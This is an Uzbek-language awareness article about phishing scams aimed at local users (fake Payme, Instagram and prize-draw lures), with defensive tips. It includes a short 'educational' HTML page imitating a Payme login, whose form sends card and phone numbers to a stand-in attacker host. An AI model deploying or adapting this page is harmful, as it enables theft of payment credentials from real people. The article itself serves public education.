Phishing nima? O‘zbek internet foydalanuvchilari eng ko‘p uchraydigan kiberfiribgarlik turi

«Karta bloklandi», «Instagram parolingiz buzilgan», «Siz yutdingiz!» – bu xabarlarga ishonmang! Phishing — bu firibgarlar sizni yolg‘on xabarlar bilan aldab, maxfiy ma’lumotlaringizni (karta raqami, SMS kod, parol, login) olish usuli. Bu nafaqat texnik, balki psixologik hujum hisoblanadi.

Iyul 26, 2025 - 16:21
 0  9
Phishing nima? O‘zbek internet foydalanuvchilari eng ko‘p uchraydigan kiberfiribgarlik turi
Rasm knowhub.uz

Phishing hujumlari odatda quyidagicha amalga oshiriladi:

  • Telegram/SMS orqali "Bankdan xabar" deb yuboriladi

  • E-mail orqali soxta "Instagram" yoki "Facebook" havolasi keladi

  • Soxta saytlarga kirishga undaydi: payme-support.uz.to, uzcard-check.netlify.app


???? Mahalliy misollar

???? 1. Soxta “Payme” xabari:

"Karta hisobingiz bloklangan. Qayta faollashtirish uchun bu yerga kiring:
???? [payme-verify.uz.to]"

Sayt ochiladi, Payme saytiga juda o‘xshaydi. Karta raqami va telefon raqami so‘raladi. Kiritganingizdan so‘ng esa, karta bo‘shab qoladi.

 2. Instagram “Huquqbuzarlik” phishingi:

“Akkountingiz mualliflik huquqini buzdi. 24 soat ichida e’tiroz bildirmasangiz, o‘chiriladi.”

Linkni bosasiz — soxta Instagram login oynasi ochiladi. Kiritilgan login/parollar firibgarga yuboriladi.

 3. Google Form orqali “Yutuq o‘yini”:

“50 ta odamga 500 ming so‘mdan sovg‘a berilmoqda. Ishtirok etish uchun quyidagi formani to‘ldiring.”

Formada karta raqami, ismingiz, tug‘ilgan sana, SMS kodi so‘raladi...


 Oddiy phishing sahifa kodi (o‘rganish uchun)

Quyidagi kod educational purpose uchun, ya’ni firibgarlikni qanday qilinishini tushunish orqali himoyalanish maqsadida keltirilgan.

<!-- phishing.html -->
<!DOCTYPE html>
<html>
<head>
  <title>Payme - Kirish</title>
</head>
<body style="font-family:sans-serif; text-align:center; margin-top:100px;">
  <h2>Payme tizimiga kirish</h2>
  <form action="https://evilserver.com/capture" method="POST">
    <input type="text" name="card" placeholder="Karta raqami"><br><br>
    <input type="text" name="phone" placeholder="Telefon raqami"><br><br>
    <input type="submit" value="Kirish">
  </form>
</body>
</html>

Firibgarlar bu kabi sahifani netlify, 000webhost, github pages kabi bepul hostingga joylab, Telegram orqali tarqatishadi.
Soxta domen nomlari: payme-support.uz.to, uzcard-login.github.io va hokazo.


???? O‘zbek foydalanuvchisi uchun phishingdan himoyalanish yo‘llari

Choralar Tavsif
1. Domenni tekshiring Rasmiy sayt: payme.uz, Firibgar: payme-verify.uz.to
2. Hech qachon SMS kodni bermang Bank, Payme, Click sizdan hech qachon SMS kod so‘ramaydi
3. 2 bosqichli himoyani yoqing Instagram, Telegram, Gmail’da 2FA ni yoqish majburiy!
4. Rasmiy ilovalargina ishonchli Hech qachon linkdan ilova yuklab olmang
5. Antivirus va brauzer plaginlar Netcraft, uBlock Origin phishingni aniqlay oladi

Sizning reaksiyangiz qanday?

like

dislike

love

funny

angry

sad

wow

SamDevX Assalomu alaykum, KnowHub.uz'ga xush kelibsiz! Mening ismim Samandar. Texnologiyalar – mening ishtiyoqim. Bolaligimdan kompyuterlarga, yoshligimdan kod yozishga qiziqib kelaman. Bu yillar davomida dasturlashni o'rganish jarayonida ko'p qiyinchiliklarga duch keldim: ma'lumotlar tarqoq, o'zbek tilidagi manbalar esa deyarli yo'q edi. KnowHub.uz aynan shu tajribadan kelib chiqib tug'ilgan g'oya. Maqsadim – o'zim o'rgangan bilim va tajribalarni siz bilan bo'lishish, dasturlash va texnologiyalar olamiga endi kirib kelayotganlarga yo'l ko'rsatish va bu sohadagi barcha qiziquvchilarni bir joyga to'plash. Bu saytda men siz bilan go'yoki bir piyola qahva ustida suhbatlashgandek, murakkab narsalarni oddiy tilda tushuntirishga harakat qilaman. Biz bu yerda: Dunyodagi eng qiziqarli texno-yangiliklarni muhokama qilamiz; Kod yozishni amaliy misollarda o'rganamiz; Open Source'ning sirli olamiga sho'ng'iymiz. Profil rasmimdagi logotip bu saytga bo'lgan jiddiy niyatim va uning ortidagi g'oyani ifodalaydi. Umid qilamanki, bu maskan siz uchun ham foydali va qiziqarli bo'ladi. Keling, birgalikda o'rganamiz va o'sishamiz! Savollaringiz bo'lsa, tortinmang! Men bilan [ijtimoiy tarmoq havolalaring yoki email] orqali bemalol bog'laning.